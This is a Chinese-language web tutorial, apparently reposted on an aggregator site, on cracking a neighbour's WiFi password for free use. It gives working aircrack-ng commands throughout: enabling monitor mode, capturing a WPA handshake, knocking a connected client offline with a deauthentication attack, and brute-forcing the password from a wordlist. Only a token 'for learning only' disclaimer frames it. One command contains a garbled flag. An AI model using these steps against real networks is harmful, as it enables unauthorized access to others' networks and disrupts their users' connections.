破解wifi蹭网教程(图文教程超详细) 您所在的位置:网站首页 怎么破解PIN码 破解wifi蹭网教程(图文教程超详细)

破解wifi蹭网教程(图文教程超详细)

2024-07-13 23:51| 来源: 网络整理| 查看: 265

前期准备 支持监听的网卡一张以及VMware kali官网

https://www.kali.org/get-kali/#kali-virtual-machines

下载位置 在这里插入图片描述 下载了vm文件后可以直接用VMware打开,开机后 用户名:kali 密码:kali

正式开始 查看已安装网卡

以下的操作都需要提升权限,默认的root密码都是kali

#提升权限 sudo su #查看网卡 airmon-ng

在这里插入图片描述 如果没有,请注意是否开启了网卡在虚拟机的连接,如下图 在这里插入图片描述

打开一个终端窗口

开启网卡监控 #开启监控 airmon-ng start wlan0

在这里插入图片描述 可以使用命令看看网卡的名字是否改变

ifconfig

在这里插入图片描述 可以看到最后的那个名字已经改变

扫描wifi airodump-ng wlan0mon

我们选择这个名叫adcd的wifi进行操作 在这里插入图片描述

拿到握手包

上述方法后,按ctrl+c,退出扫描

输入命令

airodump-ng -w freedom -c 11 --bssid 9C:2E:A1:20:65:BC wlan0mon -ignore-nefative-oneaa

-c:指定信道 -w:指定握手包的存放位置或者名字,freedom是握手包的名字 –bssid:指定路由器的MAC

需要更改两个参数,信道和地址,这两个参数分别是扫描时确定要获取的无线参数

在这里插入图片描述

在这里插入图片描述 回车后,如下界面 在这里插入图片描述 从这个界面可以看出,选定的wifi一共有一个人连接,没有人连接的wifi是无法进行操作的

开始获取

这个步骤,说白了,就是将一个用户断开连接,让他重新连接无线,这样我们就能获取到握手包

重启一个终端窗口,一样的,先sudo一下,密码默认:kali

sudo su

执行如下命令,同样的,需要输入上一步的两个参数,一个客户机的MAC,和路由器的MAC

aireplay-ng -0 2 -a 9C:2E:A1:20:65:BC -c A4:50:46:D8:74:29 wlan0mon

-a:指定路由器的MAC -c:指定客户机的MAC

在这里插入图片描述 执行成功后如上图,表明该客户机已经被成功的下线了,我们要做的就是等待客户机重新连接,他只要重新连接了,我们就能抓到握手包,进行跑字典。

抓取成功

当第四步的终端窗口出现如下 在这里插入图片描述 表明成功抓取到握手包,进行下一个步骤 注意!!这里抓到包一定要按ctrl+c退出抓包,不然抓到的握手包用不了哦

开始跑字典

包在**/home/kali/**文件夹下,找到名叫freedom-01.ivs文件,这个就是抓到的文件

在这里插入图片描述 然后就是字典,我个人建议将字典一同放在该目录下 在这里插入图片描述 然后再次重起一个终端窗口,输入如下命令

aircrack-ng -w pass.txt freedom-*.ivs

在这里插入图片描述 回车开始跑字典 请添加图片描述 能否成功看字典的是否强大,也看脸

成功界面 请添加图片描述 失败界面 在这里插入图片描述

温馨提示

本教程仅用于学习,请大家合理使用 未经本人允许,禁止转载,否则依法追究并要求索赔!



【本文地址】

公司简介

联系我们

今日新闻

    推荐新闻

    专题文章
      CopyRight 2018-2019 实验室设备网 版权所有